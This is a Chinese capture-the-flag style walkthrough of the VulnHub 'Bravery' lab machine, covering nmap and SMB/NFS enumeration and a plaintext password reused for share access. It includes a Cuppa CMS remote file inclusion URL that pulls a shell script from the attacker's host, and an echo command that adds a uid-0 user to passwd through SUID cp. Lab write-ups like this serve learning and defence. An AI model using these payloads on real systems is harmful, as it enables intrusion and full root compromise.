本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现
地址:https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/
nmap -n -p- -A 192.168.226.4 -o bravery.nmap
nmap扫描结果
发现开放了很多端口,大概都跟共享有关,有nfs,有smb,那么先看看nfs,通过Linux环境下查看nfs并挂载nfs到本地
确认存在nfs目录/var/nfsshare ,那么将其挂载到本地kali环境下
确认挂载没问题,查看下nfs目录下有啥东西
根据上述信息可能存在明文密码,疑似密码就是qwertyuioplkjhgfdsazxcvbnm 我们先看看开放的端口445,这个是共享开的端口,我们使用enum4linux看看
enum4linux 192.168.226.4 | tee bravery.smb
根据上面信息,可知有匿名共享可以直接访问,还有个共享 //192.168.226.4/secured 不能访问,但发现有本地用户david和rick ,先看看匿名共享文件夹
没发现啥有价值的信息,再回头看看上面的nfs挂载到本地的文件夹
发现了上述关于用户david的访问日志,在此可推断极有可能上面提到的共享文件 //192.168.226.4/secured 是有关于david这个用户,密码就是尝试上述提供的明文密码试试
成功登陆共享文件夹且获得上述重要信息,具体如下:
依次点击了上述标记中的每个功能按钮发现了一个登陆窗口
根据登陆窗口可以知道使用的是cuppa cms 我们在kali下搜索看看是否有可利用的漏洞
还真有,我擦,直接搞到本地目录下看看对应的利用信息
这里是存在本地和远程文件包含漏洞,那么方便使用的话就是通过本地kali搭建一个简易的web服务端,然后写好php脚本,直接利用远程文件包含,需要注意的时候这里的文件名是要txt扩展名,不要写php,测试有问题
http://192.168.226.4/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://192.168.226.3:8855/shell.txt?
反弹成功之后,找下提权的信息,发现cp存在-s权限,可以直接覆盖提权
具体细节就不演示了,大概意思就是本地建立好含有uid为0的用户bmfx,这个用户密码是bmfx,然后将信息保存到passwd文件里面使用通过搭建简易web服务,在kali上下载passwd文件到目标靶机,然后使用cp命令覆盖提权
echo 'bmfx:$1$bmfx$HuKLopGkC8MwDIxBcpRnr/:0:0:root:/root:/bin/bash' >> passwd
成功提权
